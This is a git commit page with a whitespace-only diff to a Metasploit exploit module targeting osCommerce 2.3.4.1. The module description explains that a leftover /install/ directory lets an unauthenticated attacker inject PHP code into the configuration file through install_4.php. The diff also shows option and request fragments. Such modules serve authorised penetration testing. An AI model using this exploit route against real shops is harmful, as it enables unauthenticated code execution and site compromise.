Update oscommerce_installer_unauth_code_exec.rb

GSoC/Meterpreter_Web_Console
Daniel Teixeira 2018-04-06 13:05:40 +01:00 committed by GitHub
parent 09bbbf82ba
commit 6698f1b64b
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 11 additions and 11 deletions

View File

@ -12,10 +12,10 @@ class MetasploitModule < Msf::Exploit::Remote
super(update_info(info,
'Name' => 'osCommerce Installer Unauthenticated Code Execution',
'Description' => %q{
If the /install/ directory was not removed, it is possible for an unauthenticated
attacker to run the "install_4.php" script, which will create the configuration
file for the installation. This allows the attacker to inject PHP code into the
configuration file and execute it.
If the /install/ directory was not removed, it is possible for an unauthenticated
attacker to run the "install_4.php" script, which will create the configuration
file for the installation. This allows the attacker to inject PHP code into the
configuration file and execute it.
},
'Author' => [
'Simon Scannell', # Original exploit author
@ -34,15 +34,15 @@ class MetasploitModule < Msf::Exploit::Remote
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Targets' =>
[
[ 'osCommerce 2.3.4.1', { } ],
],
[
[ 'osCommerce 2.3.4.1', { } ],
],
'DisclosureDate' => 'Apr 30 2018',
'DefaultTarget' => 0))
register_options(
[
OptString.new('URI', [true, 'The path to the install directory', '/catalog/install/'])
])
[
OptString.new('URI', [true, 'The path to the install directory', '/catalog/install/'])
])
end
def check
@ -80,6 +80,6 @@ class MetasploitModule < Msf::Exploit::Remote
'method' => 'POST',
'vars_post' => data
})
trigger
trigger
end
end